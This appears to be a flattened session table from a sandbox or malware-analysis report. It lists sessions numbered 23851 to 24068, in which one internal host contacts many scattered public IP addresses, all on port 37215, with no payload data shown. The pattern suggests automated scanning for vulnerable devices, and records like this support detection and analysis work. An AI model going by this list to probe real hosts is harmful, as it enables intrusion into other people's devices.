                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23851192.168.2.1553840222.105.211.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23852192.168.2.1547012156.160.29.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23853192.168.2.1543152181.156.67.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23854192.168.2.153765437.82.99.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23855192.168.2.1550716121.237.34.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23856192.168.2.1535488124.154.196.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23857192.168.2.154431837.37.177.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23858192.168.2.1549216222.99.123.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23859192.168.2.1544006197.165.253.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23860192.168.2.1542274197.47.88.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23861192.168.2.1543230156.97.73.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23862192.168.2.1541532121.179.110.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23863192.168.2.1549704122.121.248.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23864192.168.2.1560758122.206.234.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23865192.168.2.1540554213.236.123.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23866192.168.2.1552154156.107.237.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23867192.168.2.1550258190.170.54.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23868192.168.2.154711494.172.231.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23869192.168.2.1555164197.97.245.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23870192.168.2.1551466186.106.45.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23871192.168.2.154728637.136.137.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23872192.168.2.1554530186.223.242.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23873192.168.2.1533964222.47.150.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23874192.168.2.1556526156.177.77.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23875192.168.2.1542816156.24.186.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23876192.168.2.1547798138.157.48.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23877192.168.2.1558476156.53.71.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23878192.168.2.155445641.159.239.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23879192.168.2.155834031.44.205.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23880192.168.2.154925045.35.98.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23881192.168.2.1545210121.31.114.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23882192.168.2.1546096190.204.218.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23883192.168.2.1537650122.43.190.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23884192.168.2.1560104102.14.152.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23885192.168.2.1539388156.210.14.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23886192.168.2.1533736190.158.202.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23887192.168.2.154038837.214.20.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23888192.168.2.153627441.136.60.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23889192.168.2.1552944122.78.98.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23890192.168.2.1554964122.109.20.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23891192.168.2.1548956181.200.101.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23892192.168.2.1556280186.40.79.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23893192.168.2.1546702138.102.195.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23894192.168.2.1556348102.244.136.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23895192.168.2.1544190186.91.184.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23896192.168.2.1535270190.222.72.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23897192.168.2.1541880190.79.135.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23898192.168.2.1537328156.196.0.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23899192.168.2.155211894.243.173.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23900192.168.2.155203241.255.30.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23901192.168.2.1549712156.121.53.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23902192.168.2.153861831.242.55.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23903192.168.2.1536738102.40.243.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23904192.168.2.154917031.94.122.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23905192.168.2.1543180138.27.233.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23906192.168.2.1559078126.23.250.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23907192.168.2.1554336156.67.37.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23908192.168.2.155352845.191.253.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23909192.168.2.155110845.156.188.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23910192.168.2.1540956222.113.44.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23911192.168.2.1541808157.58.20.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23912192.168.2.1556852222.222.26.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23913192.168.2.1554398222.118.58.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23914192.168.2.155237037.105.37.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23915192.168.2.1559682181.223.86.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23916192.168.2.155572441.202.226.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23917192.168.2.1548814121.161.214.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23918192.168.2.1552212186.161.226.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23919192.168.2.155722031.246.4.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23920192.168.2.1545504102.150.130.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23921192.168.2.1534452197.201.167.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23922192.168.2.1537580102.220.25.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23923192.168.2.155627294.237.35.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23924192.168.2.1558244156.195.204.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23925192.168.2.1547448157.231.11.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23926192.168.2.1537442178.115.71.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23927192.168.2.154822441.41.201.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23928192.168.2.154242031.119.101.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23929192.168.2.1553990121.119.132.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23930192.168.2.153509431.33.68.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23931192.168.2.155591031.130.239.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23932192.168.2.156000441.195.20.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23933192.168.2.1537734190.237.36.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23934192.168.2.1537760102.219.236.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23935192.168.2.155402031.63.159.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23936192.168.2.1555826222.185.74.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23937192.168.2.153379637.238.228.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23938192.168.2.1542902181.155.148.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23939192.168.2.1539212164.117.206.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23940192.168.2.1554196157.158.108.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23941192.168.2.1555194102.123.157.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23942192.168.2.154980444.123.207.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23943192.168.2.1559052121.64.151.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23944192.168.2.1539146102.246.165.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23945192.168.2.1533520190.132.18.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23946192.168.2.155205645.0.175.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23947192.168.2.1546044190.189.216.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23948192.168.2.1542154121.97.91.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23949192.168.2.155692845.161.230.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23950192.168.2.1560290121.69.171.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23951192.168.2.154633431.108.63.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23952192.168.2.1560004103.226.54.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23953192.168.2.1551650157.140.33.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23954192.168.2.153942645.244.60.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23955192.168.2.155978437.209.37.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23956192.168.2.1552576197.183.220.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23957192.168.2.1537498190.161.46.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23958192.168.2.154233445.120.0.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23959192.168.2.153658037.184.39.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23960192.168.2.1547596197.14.133.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23961192.168.2.1539712222.22.43.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23962192.168.2.154200466.111.61.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23963192.168.2.154722294.87.106.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23964192.168.2.1546674222.91.141.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23965192.168.2.1537208121.221.166.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23966192.168.2.1536794157.173.73.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23967192.168.2.1541502157.118.131.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23968192.168.2.1549526181.240.79.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23969192.168.2.1554472181.251.153.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23970192.168.2.1541106156.175.7.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23971192.168.2.1537044122.254.154.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23972192.168.2.154022037.213.8.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23973192.168.2.1548624138.245.118.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23974192.168.2.154586837.140.224.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23975192.168.2.155149694.199.43.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23976192.168.2.153719694.186.22.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23977192.168.2.1541198197.192.94.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23978192.168.2.1548968122.229.214.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23979192.168.2.1545444102.15.227.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23980192.168.2.1557242121.26.67.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23981192.168.2.1533146121.204.190.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23982192.168.2.1551536190.139.214.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23983192.168.2.155669837.236.43.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23984192.168.2.155829831.134.122.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23985192.168.2.1555910122.115.82.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23986192.168.2.153691045.175.65.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23987192.168.2.1536082222.12.104.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23988192.168.2.1555612181.47.71.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23989192.168.2.1547768156.67.87.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23990192.168.2.1535798190.57.101.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23991192.168.2.1556858157.143.39.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23992192.168.2.153836445.158.182.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23993192.168.2.1544590138.11.39.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23994192.168.2.1546450181.174.67.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23995192.168.2.1535190157.217.187.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23996192.168.2.155323031.129.0.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23997192.168.2.1541046190.240.231.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23998192.168.2.1540986122.217.6.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23999192.168.2.1552306197.200.113.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24000192.168.2.153291031.139.41.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24001192.168.2.154792073.126.44.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24002192.168.2.1545476138.229.32.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24003192.168.2.1545062197.126.10.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24004192.168.2.153858437.73.22.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24005192.168.2.155946237.113.247.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24006192.168.2.1550732102.134.226.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24007192.168.2.155577431.40.115.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24008192.168.2.156024837.191.227.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24009192.168.2.1544064181.199.79.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24010192.168.2.1559332181.225.102.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24011192.168.2.1549632181.37.98.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24012192.168.2.154791445.68.98.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24013192.168.2.1551746197.32.120.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24014192.168.2.1546580190.113.15.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24015192.168.2.153329494.167.139.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24016192.168.2.155277437.178.66.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24017192.168.2.153750094.139.44.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24018192.168.2.1552180157.200.69.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24019192.168.2.1540862197.245.107.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24020192.168.2.1552994102.156.208.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24021192.168.2.1537846222.75.147.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24022192.168.2.156077694.11.147.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24023192.168.2.1541906102.79.186.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24024192.168.2.155922841.197.213.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24025192.168.2.1553356181.60.81.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24026192.168.2.154225037.77.252.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24027192.168.2.1532958197.173.171.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24028192.168.2.1549652156.212.162.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24029192.168.2.1534252197.96.220.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24030192.168.2.1540354186.29.158.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24031192.168.2.1545312222.112.209.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24032192.168.2.155667845.249.8.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24033192.168.2.1536658122.101.45.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24034192.168.2.1533364197.12.100.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24035192.168.2.1538636197.199.197.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24036192.168.2.1557846197.138.137.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24037192.168.2.153613499.224.43.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24038192.168.2.154123694.147.7.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24039192.168.2.154673037.9.80.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24040192.168.2.1557684157.223.92.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24041192.168.2.1548908190.95.193.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24042192.168.2.1537036122.151.64.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24043192.168.2.1536784157.10.134.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24044192.168.2.1542678157.79.121.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24045192.168.2.155625031.219.48.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24046192.168.2.155781094.15.117.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24047192.168.2.1540984222.197.87.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24048192.168.2.1538590222.65.251.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24049192.168.2.1537674102.214.238.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24050192.168.2.1559510197.82.94.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24051192.168.2.154362631.152.80.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24052192.168.2.1560202190.196.248.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24053192.168.2.1548074190.84.79.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24054192.168.2.1546170157.33.60.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24055192.168.2.1543106102.87.124.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24056192.168.2.1553518122.236.132.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24057192.168.2.1558596138.1.60.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24058192.168.2.1536574181.147.231.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24059192.168.2.153403437.239.60.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24060192.168.2.155846041.255.45.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24061192.168.2.155615831.220.217.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24062192.168.2.1560974102.72.106.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24063192.168.2.1547024138.171.190.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24064192.168.2.1552868121.33.128.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24065192.168.2.154590441.153.121.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24066192.168.2.1540558138.63.199.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24067192.168.2.154136445.125.220.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24068192.168.2.1558276186.104.168.18337215
                                              TimestampBytes transferredDirectionData


